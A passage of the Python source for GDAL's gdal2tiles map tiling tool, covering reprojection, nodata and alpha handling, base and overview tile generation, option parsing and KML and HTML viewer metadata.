input_srs.SetFromUserInput(options.s_srs) input_srs_wkt = input_srs.ExportToWkt() else: input_srs_wkt = input_dataset.GetProjection() if not input_srs_wkt and input_dataset.GetGCPCount() != 0: input_srs_wkt = input_dataset.GetGCPProjection() if input_srs_wkt: input_srs = osr.SpatialReference() input_srs.ImportFromWkt(input_srs_wkt) return input_srs, input_srs_wkt def setup_output_srs(input_srs, options): """ Setup the desired SRS (based on options) """ output_srs = osr.SpatialReference() if options.profile == 'mercator': output_srs.ImportFromEPSG(3857) elif options.profile == 'geodetic': output_srs.ImportFromEPSG(4326) else: output_srs = input_srs return output_srs def has_georeference(dataset): return (dataset.GetGeoTransform() != (0.0, 1.0, 0.0, 0.0, 0.0, 1.0) or dataset.GetGCPCount() != 0) def reproject_dataset(from_dataset, from_srs, to_srs, options=None): """ Returns the input dataset in the expected "destination" SRS. If the dataset is already in the correct SRS, returns it unmodified """ if not from_srs or not to_srs: raise GDALError("from and to SRS must be defined to reproject the dataset") if (from_srs.ExportToProj4() != to_srs.ExportToProj4()) or (from_dataset.GetGCPCount() != 0): to_dataset = gdal.AutoCreateWarpedVRT(from_dataset, from_srs.ExportToWkt(), to_srs.ExportToWkt()) if options and options.verbose: print("Warping of the raster by AutoCreateWarpedVRT (result saved into 'tiles.vrt')") to_dataset.GetDriver().CreateCopy("tiles.vrt", to_dataset) return to_dataset else: return from_dataset def add_gdal_warp_options_to_string(vrt_string, warp_options): if not warp_options: return vrt_string vrt_root = ElementTree.fromstring(vrt_string) options = vrt_root.find("GDALWarpOptions") if options is None: return vrt_string for key, value in warp_options.items(): tb = ElementTree.TreeBuilder() tb.start("Option", {"name": key}) tb.data(value) tb.end("Option") elem = tb.close() options.insert(0, elem) return ElementTree.tostring(vrt_root).decode() def update_no_data_values(warped_vrt_dataset, nodata_values, options=None): """ Takes an array of NODATA values and forces them on the WarpedVRT file dataset passed """ # TODO: gbataille - Seems that I forgot tests there assert nodata_values != [] vrt_string = warped_vrt_dataset.GetMetadata("xml:VRT")[0] vrt_string = add_gdal_warp_options_to_string( vrt_string, {"INIT_DEST": "NO_DATA", "UNIFIED_SRC_NODATA": "YES"}) # TODO: gbataille - check the need for this replacement. Seems to work without # # replace BandMapping tag for NODATA bands.... # for i in range(len(nodata_values)): # s = s.replace( # '<BandMapping src="%i" dst="%i"/>' % ((i+1), (i+1)), # """ # <BandMapping src="%i" dst="%i"> # <SrcNoDataReal>%i</SrcNoDataReal> # <SrcNoDataImag>0</SrcNoDataImag> # <DstNoDataReal>%i</DstNoDataReal> # <DstNoDataImag>0</DstNoDataImag> # </BandMapping> # """ % ((i+1), (i+1), nodata_values[i], nodata_values[i])) corrected_dataset = gdal.Open(vrt_string) # set NODATA_VALUE metadata corrected_dataset.SetMetadataItem( 'NODATA_VALUES', ' '.join([str(i) for i in nodata_values])) if options and options.verbose: print("Modified warping result saved into 'tiles1.vrt'") with open("tiles1.vrt", "w") as f: f.write(corrected_dataset.GetMetadata("xml:VRT")[0]) return corrected_dataset def add_alpha_band_to_string_vrt(vrt_string): # TODO: gbataille - Old code speak of this being equivalent to gdalwarp -dstalpha # To be checked vrt_root = ElementTree.fromstring(vrt_string) index = 0 nb_bands = 0 for subelem in list(vrt_root): if subelem.tag == "VRTRasterBand": nb_bands += 1 color_node = subelem.find("./ColorInterp") if color_node is not None and color_node.text == "Alpha": raise Exception("Alpha band already present") else: if nb_bands: # This means that we are one element after the Band definitions break index += 1 tb = ElementTree.TreeBuilder() tb.start("VRTRasterBand", {'dataType': "Byte", "band": str(nb_bands + 1), "subClass": "VRTWarpedRasterBand"}) tb.start("ColorInterp", {}) tb.data("Alpha") tb.end("ColorInterp") tb.end("VRTRasterBand") elem = tb.close() vrt_root.insert(index, elem) warp_options = vrt_root.find(".//GDALWarpOptions") tb = ElementTree.TreeBuilder() tb.start("DstAlphaBand", {}) tb.data(str(nb_bands + 1)) tb.end("DstAlphaBand") elem = tb.close() warp_options.append(elem) # TODO: gbataille - this is a GDALWarpOptions. Why put it in a specific place? tb = ElementTree.TreeBuilder() tb.start("Option", {"name": "INIT_DEST"}) tb.data("0") tb.end("Option") elem = tb.close() warp_options.append(elem) return ElementTree.tostring(vrt_root).decode() def update_alpha_value_for_non_alpha_inputs(warped_vrt_dataset, options=None): """ Handles dataset with 1 or 3 bands, i.e. without alpha channel, in the case the nodata value has not been forced by options """ if warped_vrt_dataset.RasterCount in [1, 3]: vrt_string = warped_vrt_dataset.GetMetadata("xml:VRT")[0] vrt_string = add_alpha_band_to_string_vrt(vrt_string) warped_vrt_dataset = gdal.Open(vrt_string) if options and options.verbose: print("Modified -dstalpha warping result saved into 'tiles1.vrt'") with open("tiles1.vrt", "w") as f: f.write(warped_vrt_dataset.GetMetadata("xml:VRT")[0]) return warped_vrt_dataset def nb_data_bands(dataset): """ Return the number of data (non-alpha) bands of a gdal dataset """ alphaband = dataset.GetRasterBand(1).GetMaskBand() if ((alphaband.GetMaskFlags() & gdal.GMF_ALPHA) or dataset.RasterCount == 4 or dataset.RasterCount == 2): return dataset.RasterCount - 1 return dataset.RasterCount def create_base_tile(tile_job_info, tile_detail, queue=None): dataBandsCount = tile_job_info.nb_data_bands output = tile_job_info.output_file_path tileext = tile_job_info.tile_extension tile_size = tile_job_info.tile_size options = tile_job_info.options tilebands = dataBandsCount + 1 cached_ds = getattr(threadLocal, 'cached_ds', None) if cached_ds and cached_ds.GetDescription() == tile_job_info.src_file: ds = cached_ds else: ds = gdal.Open(tile_job_info.src_file, gdal.GA_ReadOnly) threadLocal.cached_ds = ds mem_drv = gdal.GetDriverByName('MEM') out_drv = gdal.GetDriverByName(tile_job_info.tile_driver) alphaband = ds.GetRasterBand(1).GetMaskBand() tx = tile_detail.tx ty = tile_detail.ty tz = tile_detail.tz rx = tile_detail.rx ry = tile_detail.ry rxsize = tile_detail.rxsize rysize = tile_detail.rysize wx = tile_detail.wx wy = tile_detail.wy wxsize = tile_detail.wxsize wysize = tile_detail.wysize querysize = tile_detail.querysize # Tile dataset in memory tilefilename = os.path.join( output, str(tz), str(tx), "%s.%s" % (ty, tileext)) dstile = mem_drv.Create('', tile_size, tile_size, tilebands) data = alpha = None if options.verbose: print("\tReadRaster Extent: ", (rx, ry, rxsize, rysize), (wx, wy, wxsize, wysize)) # Query is in 'nearest neighbour' but can be bigger in then the tile_size # We scale down the query to the tile_size by supplied algorithm. if rxsize != 0 and rysize != 0 and wxsize != 0 and wysize != 0: alpha = alphaband.ReadRaster(rx, ry, rxsize, rysize, wxsize, wysize) # Detect totally transparent tile and skip its creation if tile_job_info.exclude_transparent and len(alpha) == alpha.count('\x00'.encode('ascii')): return data = ds.ReadRaster(rx, ry, rxsize, rysize, wxsize, wysize, band_list=list(range(1, dataBandsCount + 1))) # The tile in memory is a transparent file by default. Write pixel values into it if # any if data: if tile_size == querysize: # Use the ReadRaster result directly in tiles ('nearest neighbour' query) dstile.WriteRaster(wx, wy, wxsize, wysize, data, band_list=list(range(1, dataBandsCount + 1))) dstile.WriteRaster(wx, wy, wxsize, wysize, alpha, band_list=[tilebands]) # Note: For source drivers based on WaveLet compression (JPEG2000, ECW, # MrSID) the ReadRaster function returns high-quality raster (not ugly # nearest neighbour) # TODO: Use directly 'near' for WaveLet files else: # Big ReadRaster query in memory scaled to the tile_size - all but 'near' # algo dsquery = mem_drv.Create('', querysize, querysize, tilebands) # TODO: fill the null value in case a tile without alpha is produced (now # only png tiles are supported) dsquery.WriteRaster(wx, wy, wxsize, wysize, data, band_list=list(range(1, dataBandsCount + 1))) dsquery.WriteRaster(wx, wy, wxsize, wysize, alpha, band_list=[tilebands]) scale_query_to_tile(dsquery, dstile, tile_job_info.tile_driver, options, tilefilename=tilefilename) del dsquery del data if options.resampling != 'antialias': # Write a copy of tile to png/jpg out_drv.CreateCopy(tilefilename, dstile, strict=0) del dstile # Create a KML file for this tile. if tile_job_info.kml: kmlfilename = os.path.join(output, str(tz), str(tx), '%d.kml' % ty) if not options.resume or not os.path.exists(kmlfilename): with open(kmlfilename, 'wb') as f: f.write(generate_kml( tx, ty, tz, tile_job_info.tile_extension, tile_job_info.tile_size, get_tile_swne(tile_job_info, options), tile_job_info.options ).encode('utf-8')) if queue: queue.put("tile %s %s %s" % (tx, ty, tz)) def create_overview_tiles(tile_job_info, output_folder, options): """Generation of the overview tiles (higher in the pyramid) based on existing tiles""" mem_driver = gdal.GetDriverByName('MEM') tile_driver = tile_job_info.tile_driver out_driver = gdal.GetDriverByName(tile_driver) tilebands = tile_job_info.nb_data_bands + 1 # Usage of existing tiles: from 4 underlying tiles generate one as overview. tcount = 0 for tz in range(tile_job_info.tmaxz - 1, tile_job_info.tminz - 1, -1): tminx, tminy, tmaxx, tmaxy = tile_job_info.tminmax[tz] tcount += (1 + abs(tmaxx - tminx)) * (1 + abs(tmaxy - tminy)) ti = 0 if tcount == 0: return if not options.quiet: print("Generating Overview Tiles:") progress_bar = ProgressBar(tcount) progress_bar.start() for tz in range(tile_job_info.tmaxz - 1, tile_job_info.tminz - 1, -1): tminx, tminy, tmaxx, tmaxy = tile_job_info.tminmax[tz] for ty in range(tmaxy, tminy - 1, -1): for tx in range(tminx, tmaxx + 1): ti += 1 tilefilename = os.path.join(output_folder, str(tz), str(tx), "%s.%s" % (ty, tile_job_info.tile_extension)) if options.verbose: print(ti, '/', tcount, tilefilename) if options.resume and os.path.exists(tilefilename): if options.verbose: print("Tile generation skipped because of --resume") else: progress_bar.log_progress() continue # Create directories for the tile if not os.path.exists(os.path.dirname(tilefilename)): os.makedirs(os.path.dirname(tilefilename)) dsquery = mem_driver.Create('', 2 * tile_job_info.tile_size, 2 * tile_job_info.tile_size, tilebands) # TODO: fill the null value dstile = mem_driver.Create('', tile_job_info.tile_size, tile_job_info.tile_size, tilebands) # TODO: Implement more clever walking on the tiles with cache functionality # probably walk should start with reading of four tiles from top left corner # Hilbert curve children = [] # Read the tiles and write them to query window for y in range(2 * ty, 2 * ty + 2): for x in range(2 * tx, 2 * tx + 2): minx, miny, maxx, maxy = tile_job_info.tminmax[tz + 1] if x >= minx and x <= maxx and y >= miny and y <= maxy: base_tile_path = os.path.join(output_folder, str(tz + 1), str(x), "%s.%s" % (y, tile_job_info.tile_extension)) if not os.path.isfile(base_tile_path): continue dsquerytile = gdal.Open( base_tile_path, gdal.GA_ReadOnly) if (ty == 0 and y == 1) or (ty != 0 and (y % (2 * ty)) != 0): tileposy = 0 else: tileposy = tile_job_info.tile_size if tx: tileposx = x % (2 * tx) * tile_job_info.tile_size elif tx == 0 and x == 1: tileposx = tile_job_info.tile_size else: tileposx = 0 dsquery.WriteRaster( tileposx, tileposy, tile_job_info.tile_size, tile_job_info.tile_size, dsquerytile.ReadRaster(0, 0, tile_job_info.tile_size, tile_job_info.tile_size), band_list=list(range(1, tilebands + 1))) children.append([x, y, tz + 1]) if children: scale_query_to_tile(dsquery, dstile, tile_driver, options, tilefilename=tilefilename) # Write a copy of tile to png/jpg if options.resampling != 'antialias': # Write a copy of tile to png/jpg out_driver.CreateCopy(tilefilename, dstile, strict=0) if options.verbose: print("\tbuild from zoom", tz + 1, " tiles:", (2 * tx, 2 * ty), (2 * tx + 1, 2 * ty), (2 * tx, 2 * ty + 1), (2 * tx + 1, 2 * ty + 1)) # Create a KML file for this tile. if tile_job_info.kml: with open(os.path.join( output_folder, '%d/%d/%d.kml' % (tz, tx, ty) ), 'wb') as f: f.write(generate_kml( tx, ty, tz, tile_job_info.tile_extension, tile_job_info.tile_size, get_tile_swne(tile_job_info, options), options, children ).encode('utf-8')) if not options.verbose and not options.quiet: progress_bar.log_progress() def optparse_init(): """Prepare the option parser for input (argv)""" from optparse import OptionParser, OptionGroup usage = "Usage: %prog [options] input_file [output]" p = OptionParser(usage, version="%prog " + __version__) p.add_option("-p", "--profile", dest='profile', type='choice', choices=profile_list, help=("Tile cutting profile (%s) - default 'mercator' " "(Google Maps compatible)" % ",".join(profile_list))) p.add_option("-r", "--resampling", dest="resampling", type='choice', choices=resampling_list, help="Resampling method (%s) - default 'average'" % ",".join(resampling_list)) p.add_option('-s', '--s_srs', dest="s_srs", metavar="SRS", help="The spatial reference system used for the source input data") p.add_option('-z', '--zoom', dest="zoom", help="Zoom levels to render (format:'2-5' or '10').") p.add_option('-e', '--resume', dest="resume", action="store_true", help="Resume mode. Generate only missing files.") p.add_option('-a', '--srcnodata', dest="srcnodata", metavar="NODATA", help="NODATA transparency value to assign to the input data") p.add_option('-d', '--tmscompatible', dest="tmscompatible", action="store_true", help=("When using the geodetic profile, specifies the base resolution " "as 0.703125 or 2 tiles at zoom level 0.")) p.add_option("-v", "--verbose", action="store_true", dest="verbose", help="Print status messages to stdout") p.add_option("-x", "--exclude", action="store_true", dest="exclude_transparent", help="Exclude transparent tiles from result tileset") p.add_option("-q", "--quiet", action="store_true", dest="quiet", help="Disable messages and status to stdout") p.add_option("--processes", dest="nb_processes", type='int', help="Number of processes to use for tiling") # KML options g = OptionGroup(p, "KML (Google Earth) options", "Options for generated Google Earth SuperOverlay metadata") g.add_option("-k", "--force-kml", dest='kml', action="store_true", help=("Generate KML for Google Earth - default for 'geodetic' profile and " "'raster' in EPSG:4326. For a dataset with different projection use " "with caution!")) g.add_option("-n", "--no-kml", dest='kml', action="store_false", help="Avoid automatic generation of KML files for EPSG:4326") g.add_option("-u", "--url", dest='url', help="URL address where the generated tiles are going to be published") p.add_option_group(g) # HTML options g = OptionGroup(p, "Web viewer options", "Options for generated HTML viewers a la Google Maps") g.add_option("-w", "--webviewer", dest='webviewer', type='choice', choices=webviewer_list, help="Web viewer to generate (%s) - default 'all'" % ",".join(webviewer_list)) g.add_option("-t", "--title", dest='title', help="Title of the map") g.add_option("-c", "--copyright", dest='copyright', help="Copyright for the map") g.add_option("-g", "--googlekey", dest='googlekey', help="Google Maps API key from http://code.google.com/apis/maps/signup.html") g.add_option("-b", "--bingkey", dest='bingkey', help="Bing Maps API key from https://www.bingmapsportal.com/") p.add_option_group(g) p.set_defaults(verbose=False, profile="mercator", kml=False, url='', webviewer='all', copyright='', resampling='average', resume=False, googlekey='INSERT_YOUR_KEY_HERE', bingkey='INSERT_YOUR_KEY_HERE', processes=1) return p def process_args(argv): parser = optparse_init() options, args = parser.parse_args(args=argv) # Args should be either an input file OR an input file and an output folder if not args: exit_with_error("You need to specify at least an input file as argument to the script") if len(args) > 2: exit_with_error("Processing of several input files is not supported.", "Please first use a tool like gdal_vrtmerge.py or gdal_merge.py on the " "files: gdal_vrtmerge.py -o merged.vrt %s" % " ".join(args)) input_file = args[0] if not os.path.isfile(input_file): exit_with_error("The provided input file %s does not exist or is not a file" % input_file) if len(args) == 2: output_folder = args[1] else: # Directory with input filename without extension in actual directory output_folder = os.path.splitext(os.path.basename(input_file))[0] options = options_post_processing(options, input_file, output_folder) return input_file, output_folder, options def options_post_processing(options, input_file, output_folder): if not options.title: options.title = os.path.basename(input_file) if options.url and not options.url.endswith('/'): options.url += '/' if options.url: out_path = output_folder if out_path.endswith("/"): out_path = out_path[:-1] options.url += os.path.basename(out_path) + '/' # Supported options if options.resampling == 'antialias' and not numpy_available: exit_with_error("'antialias' resampling algorithm is not available.", "Install PIL (Python Imaging Library) and numpy.") try: os.path.basename(input_file).encode('ascii') except UnicodeEncodeError: full_ascii = False else: full_ascii = True # LC_CTYPE check if not full_ascii and 'UTF-8' not in os.environ.get("LC_CTYPE", ""): if not options.quiet: print("\nWARNING: " "You are running gdal2tiles.py with a LC_CTYPE environment variable that is " "not UTF-8 compatible, and your input file contains non-ascii characters. " "The generated sample googlemaps, openlayers or " "leaflet files might contain some invalid characters as a result\n") # Output the results if options.verbose: print("Options:", options) print("Input:", input_file) print("Output:", output_folder) print("Cache: %s MB" % (gdal.GetCacheMax() / 1024 / 1024)) print('') return options class TileDetail(object): tx = 0 ty = 0 tz = 0 rx = 0 ry = 0 rxsize = 0 rysize = 0 wx = 0 wy = 0 wxsize = 0 wysize = 0 querysize = 0 def __init__(self, **kwargs): for key in kwargs: if hasattr(self, key): setattr(self, key, kwargs[key]) def __unicode__(self): return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz) def __str__(self): return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz) def __repr__(self): return "TileDetail %s\n%s\n%s\n" % (self.tx, self.ty, self.tz) class TileJobInfo(object): """ Plain object to hold tile job configuration for a dataset """ src_file = "" nb_data_bands = 0 output_file_path = "" tile_extension = "" tile_size = 0 tile_driver = None kml = False tminmax = [] tminz = 0 tmaxz = 0 in_srs_wkt = 0 out_geo_trans = [] ominy = 0 is_epsg_4326 = False options = None exclude_transparent = False def __init__(self, **kwargs): for key in kwargs: if hasattr(self, key): setattr(self, key, kwargs[key]) def __unicode__(self): return "TileJobInfo %s\n" % (self.src_file) def __str__(self): return "TileJobInfo %s\n" % (self.src_file) def __repr__(self): return "TileJobInfo %s\n" % (self.src_file) class Gdal2TilesError(Exception): pass class GDAL2Tiles(object): def __init__(self, input_file, output_folder, options): """Constructor function - initialization""" self.out_drv = None self.mem_drv = None self.warped_input_dataset = None self.out_srs = None self.nativezoom = None self.tminmax = None self.tsize = None self.mercator = None self.geodetic = None self.alphaband = None self.dataBandsCount = None self.out_gt = None self.tileswne = None self.swne = None self.ominx = None self.omaxx = None self.omaxy = None self.ominy = None self.input_file = None self.output_folder = None self.isepsg4326 = None self.in_srs_wkt = None # Tile format self.tile_size = 256 self.tiledriver = 'PNG' self.tileext = 'png' self.tmp_dir = tempfile.mkdtemp() self.tmp_vrt_filename = os.path.join(self.tmp_dir, str(uuid4()) + '.vrt') # Should we read bigger window of the input raster and scale it down? # Note: Modified later by open_input() # Not for 'near' resampling # Not for Wavelet based drivers (JPEG2000, ECW, MrSID) # Not for 'raster' profile self.scaledquery = True # How big should be query window be for scaling down # Later on reset according the chosen resampling algorightm self.querysize = 4 * self.tile_size # Should we use Read on the input file for generating overview tiles? # Note: Modified later by open_input() # Otherwise the overview tiles are generated from existing underlying tiles self.overviewquery = False self.input_file = input_file self.output_folder = output_folder self.options = options if self.options.resampling == 'near': self.querysize = self.tile_size elif self.options.resampling == 'bilinear': self.querysize = self.tile_size * 2 # User specified zoom levels self.tminz = None self.tmaxz = None if self.options.zoom: minmax = self.options.zoom.split('-', 1) minmax.extend(['']) zoom_min, zoom_max = minmax[:2] self.tminz = int(zoom_min) if zoom_max: self.tmaxz = int(zoom_max) else: self.tmaxz = int(zoom_min) # KML generation self.kml = self.options.kml # ------------------------------------------------------------------------- def open_input(self): """Initialization of the input raster, reprojection if necessary""" gdal.AllRegister() self.out_drv = gdal.GetDriverByName(self.tiledriver) self.mem_drv = gdal.GetDriverByName('MEM') if not self.out_drv: raise Exception("The '%s' driver was not found, is it available in this GDAL build?" % self.tiledriver) if not self.mem_drv: raise Exception("The 'MEM' driver was not found, is it available in this GDAL build?") # Open the input file if self.input_file: input_dataset = gdal.Open(self.input_file, gdal.GA_ReadOnly) else: raise Exception("No input file was specified") if self.options.verbose: print("Input file:", "( %sP x %sL - %s bands)" % (input_dataset.RasterXSize, input_dataset.RasterYSize, input_dataset.RasterCount)) if not input_dataset: # Note: GDAL prints the ERROR message too exit_with_error("It is not possible to open the input file '%s'." % self.input_file) # Read metadata from the input file if input_dataset.RasterCount == 0: exit_with_error("Input file '%s' has no raster band" % self.input_file) if input_dataset.GetRasterBand(1).GetRasterColorTable(): exit_with_error( "Please convert this file to RGB/RGBA and run gdal2tiles on the result.", "From paletted file you can create RGBA file (temp.vrt) by:\n" "gdal_translate -of vrt -expand rgba %s temp.vrt\n" "then run:\n" "gdal2tiles temp.vrt" % self.input_file ) in_nodata = setup_no_data_values(input_dataset, self.options) if self.options.verbose: print("Preprocessed file:", "( %sP x %sL - %s bands)" % (input_dataset.RasterXSize, input_dataset.RasterYSize, input_dataset.RasterCount)) in_srs, self.in_srs_wkt = setup_input_srs(input_dataset, self.options) self.out_srs = setup_output_srs(in_srs, self.options) # If input and output reference systems are different, we reproject the input dataset into # the output reference system for easier manipulation self.warped_input_dataset = None if self.options.profile in ('mercator', 'geodetic'): if not in_srs: exit_with_error( "Input file has unknown SRS.", "Use --s_srs ESPG:xyz (or similar) to provide source reference system.") if not has_georeference(input_dataset): exit_with_error( "There is no georeference - neither affine transformation (worldfile) " "nor GCPs. You can generate only 'raster' profile tiles.", "Either gdal2tiles with parameter -p 'raster' or use another GIS " "software for georeference e.g. gdal_transform -gcp / -a_ullr / -a_srs" ) if ((in_srs.ExportToProj4() != self.out_srs.ExportToProj4()) or (input_dataset.GetGCPCount() != 0)): self.warped_input_dataset = reproject_dataset( input_dataset, in_srs, self.out_srs) if in_nodata: self.warped_input_dataset = update_no_data_values( self.warped_input_dataset, in_nodata, options=self.options) else: self.warped_input_dataset = update_alpha_value_for_non_alpha_inputs( self.warped_input_dataset, options=self.options) if self.warped_input_dataset and self.options.verbose: print("Projected file:", "tiles.vrt", "( %sP x %sL - %s bands)" % ( self.warped_input_dataset.RasterXSize, self.warped_input_dataset.RasterYSize, self.warped_input_dataset.RasterCount)) if not self.warped_input_dataset: self.warped_input_dataset = input_dataset gdal.GetDriverByName('VRT').CreateCopy(self.tmp_vrt_filename, self.warped_input_dataset) # Get alpha band (either directly or from NODATA value) self.alphaband = self.warped_input_dataset.GetRasterBand(1).GetMaskBand() self.dataBandsCount = nb_data_bands(self.warped_input_dataset) # KML test self.isepsg4326 = False srs4326 = osr.SpatialReference() srs4326.ImportFromEPSG(4326) if self.out_srs and srs4326.ExportToProj4() == self.out_srs.ExportToProj4(): self.kml = True self.isepsg4326 = True if self.options.verbose: print("KML autotest OK!") # Read the georeference self.out_gt = self.warped_input_dataset.GetGeoTransform() # Test the size of the pixel # Report error in case rotation/skew is in geotransform (possible only in 'raster' profile) if (self.out_gt[2], self.out_gt[4]) != (0, 0): exit_with_error("Georeference of the raster contains rotation or skew. " "Such raster is not supported. Please use gdalwarp first.") # Here we expect: pixel is square, no rotation on the raster # Output Bounds - coordinates in the output SRS self.ominx = self.out_gt[0] self.omaxx = self.out_gt[0] + self.warped_input_dataset.RasterXSize * self.out_gt[1] self.omaxy = self.out_gt[3] self.ominy = self.out_gt[3] - self.warped_input_dataset.RasterYSize * self.out_gt[1] # Note: maybe round(x, 14) to avoid the gdal_translate behaviour, when 0 becomes -1e-15 if self.options.verbose: print("Bounds (output srs):", round(self.ominx, 13), self.ominy, self.omaxx, self.omaxy) # Calculating ranges for tiles in different zoom levels if self.options.profile == 'mercator': self.mercator = GlobalMercator() # Function which generates SWNE in LatLong for given tile self.tileswne = self.mercator.TileLatLonBounds # Generate table with min max tile coordinates for all zoomlevels self.tminmax = list(range(0, 32)) for tz in range(0, 32): tminx, tminy = self.mercator.MetersToTile(self.ominx, self.ominy, tz) tmaxx, tmaxy = self.mercator.MetersToTile(self.omaxx, self.omaxy, tz) # crop tiles extending world limits (+-180,+-90) tminx, tminy = max(0, tminx), max(0, tminy) tmaxx, tmaxy = min(2**tz - 1, tmaxx), min(2**tz - 1, tmaxy) self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy) # TODO: Maps crossing 180E (Alaska?) # Get the minimal zoom level (map covers area equivalent to one tile) if self.tminz is None: self.tminz = self.mercator.ZoomForPixelSize( self.out_gt[1] * max(self.warped_input_dataset.RasterXSize, self.warped_input_dataset.RasterYSize) / float(self.tile_size)) # Get the maximal zoom level # (closest possible zoom level up on the resolution of raster) if self.tmaxz is None: self.tmaxz = self.mercator.ZoomForPixelSize(self.out_gt[1]) if self.options.verbose: print("Bounds (latlong):", self.mercator.MetersToLatLon(self.ominx, self.ominy), self.mercator.MetersToLatLon(self.omaxx, self.omaxy)) print('MinZoomLevel:', self.tminz) print("MaxZoomLevel:", self.tmaxz, "(", self.mercator.Resolution(self.tmaxz), ")") if self.options.profile == 'geodetic': self.geodetic = GlobalGeodetic(self.options.tmscompatible) # Function which generates SWNE in LatLong for given tile self.tileswne = self.geodetic.TileLatLonBounds # Generate table with min max tile coordinates for all zoomlevels self.tminmax = list(range(0, 32)) for tz in range(0, 32): tminx, tminy = self.geodetic.LonLatToTile(self.ominx, self.ominy, tz) tmaxx, tmaxy = self.geodetic.LonLatToTile(self.omaxx, self.omaxy, tz) # crop tiles extending world limits (+-180,+-90) tminx, tminy = max(0, tminx), max(0, tminy) tmaxx, tmaxy = min(2**(tz + 1) - 1, tmaxx), min(2**tz - 1, tmaxy) self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy) # TODO: Maps crossing 180E (Alaska?) # Get the maximal zoom level # (closest possible zoom level up on the resolution of raster) if self.tminz is None: self.tminz = self.geodetic.ZoomForPixelSize( self.out_gt[1] * max(self.warped_input_dataset.RasterXSize, self.warped_input_dataset.RasterYSize) / float(self.tile_size)) # Get the maximal zoom level # (closest possible zoom level up on the resolution of raster) if self.tmaxz is None: self.tmaxz = self.geodetic.ZoomForPixelSize(self.out_gt[1]) if self.options.verbose: print("Bounds (latlong):", self.ominx, self.ominy, self.omaxx, self.omaxy) if self.options.profile == 'raster': def log2(x): return math.log10(x) / math.log10(2) self.nativezoom = int( max(math.ceil(log2(self.warped_input_dataset.RasterXSize / float(self.tile_size))), math.ceil(log2(self.warped_input_dataset.RasterYSize / float(self.tile_size))))) if self.options.verbose: print("Native zoom of the raster:", self.nativezoom) # Get the minimal zoom level (whole raster in one tile) if self.tminz is None: self.tminz = 0 # Get the maximal zoom level (native resolution of the raster) if self.tmaxz is None: self.tmaxz = self.nativezoom # Generate table with min max tile coordinates for all zoomlevels self.tminmax = list(range(0, self.tmaxz + 1)) self.tsize = list(range(0, self.tmaxz + 1)) for tz in range(0, self.tmaxz + 1): tsize = 2.0**(self.nativezoom - tz) * self.tile_size tminx, tminy = 0, 0 tmaxx = int(math.ceil(self.warped_input_dataset.RasterXSize / tsize)) - 1 tmaxy = int(math.ceil(self.warped_input_dataset.RasterYSize / tsize)) - 1 self.tsize[tz] = math.ceil(tsize) self.tminmax[tz] = (tminx, tminy, tmaxx, tmaxy) # Function which generates SWNE in LatLong for given tile if self.kml and self.in_srs_wkt: ct = osr.CoordinateTransformation(in_srs, srs4326) def rastertileswne(x, y, z): pixelsizex = (2**(self.tmaxz - z) * self.out_gt[1]) # X-pixel size in level west = self.out_gt[0] + x * self.tile_size * pixelsizex east = west + self.tile_size * pixelsizex south = self.ominy + y * self.tile_size * pixelsizex north = south + self.tile_size * pixelsizex if not self.isepsg4326: # Transformation to EPSG:4326 (WGS84 datum) west, south = ct.TransformPoint(west, south)[:2] east, north = ct.TransformPoint(east, north)[:2] return south, west, north, east self.tileswne = rastertileswne else: self.tileswne = lambda x, y, z: (0, 0, 0, 0) # noqa def generate_metadata(self): """ Generation of main metadata files and HTML viewers (metadata related to particular tiles are generated during the tile processing). """ if not os.path.exists(self.output_folder): os.makedirs(self.output_folder) if self.options.profile == 'mercator': south, west = self.mercator.MetersToLatLon(self.ominx, self.ominy) north, east = self.mercator.MetersToLatLon(self.omaxx, self.omaxy) south, west = max(-85.05112878, south), max(-180.0, west) north, east = min(85.05112878, north), min(180.0, east) self.swne = (south, west, north, east) # Generate googlemaps.html if self.options.webviewer in ('all', 'google') and self.options.profile == 'mercator': if (not self.options.resume or not os.path.exists(os.path.join(self.output_folder, 'googlemaps.html'))): with open(os.path.join(self.output_folder, 'googlemaps.html'), 'wb') as f: f.write(self.generate_googlemaps().encode('utf-8')) # Generate openlayers.html if self.options.webviewer in ('all', 'openlayers'): if (not self.options.resume or not os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))): with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f: f.write(self.generate_openlayers().encode('utf-8')) # Generate leaflet.html if self.options.webviewer in ('all', 'leaflet'): if (not self.options.resume or not os.path.exists(os.path.join(self.output_folder, 'leaflet.html'))): with open(os.path.join(self.output_folder, 'leaflet.html'), 'wb') as f: f.write(self.generate_leaflet().encode('utf-8')) elif self.options.profile == 'geodetic': west, south = self.ominx, self.ominy east, north = self.omaxx, self.omaxy south, west = max(-90.0, south), max(-180.0, west) north, east = min(90.0, north), min(180.0, east) self.swne = (south, west, north, east) # Generate openlayers.html if self.options.webviewer in ('all', 'openlayers'): if (not self.options.resume or not os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))): with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f: f.write(self.generate_openlayers().encode('utf-8')) elif self.options.profile == 'raster': west, south = self.ominx, self.ominy east, north = self.omaxx, self.omaxy self.swne = (south, west, north, east) # Generate openlayers.html if self.options.webviewer in ('all', 'openlayers'): if (not self.options.resume or not os.path.exists(os.path.join(self.output_folder, 'openlayers.html'))): with open(os.path.join(self.output_folder, 'openlayers.html'), 'wb') as f: f.write(self.generate_openlayers().encode('utf-8')) # Generate tilemapresource.xml. if not self.options.resume or not os.path.exists(os.path.join(self.output_folder, 'tilemapresource.xml')): with open(os.path.join(self.output_folder, 'tilemapresource.xml'), 'wb') as f: f.write(self.generate_tilemapresource().encode('utf-8')) if self.kml: # TODO: Maybe problem for not automatically generated tminz # The root KML should contain links to all tiles in the tminz level children = [] xmin, ymin, xmax, ymax = self.tminmax[self.tminz] for x in range(xmin, xmax + 1): for y in range(ymin, ymax + 1): children.append([x, y, self.tminz]) # Generate Root KML if self.kml: if (not self.options.resume or not os.path.exists(os.path.join(self.output_folder, 'doc.kml'))): with open(os.path.join(self.output_folder, 'doc.kml'), 'wb') as f: f.write(generate_kml( None, None, None, self.tileext, self.tile_size, self.tileswne, self.options, children ).encode('utf-8')) def generate_base_tiles(self): """ Generation of the base tiles (the lowest in the pyramid) directly from the input raster """ if not self.options.quiet: print("Generating Base Tiles:") if self.options.verbose: print('') print("Tiles generated from the max zoom level:") print("----------------------------------------") print('') 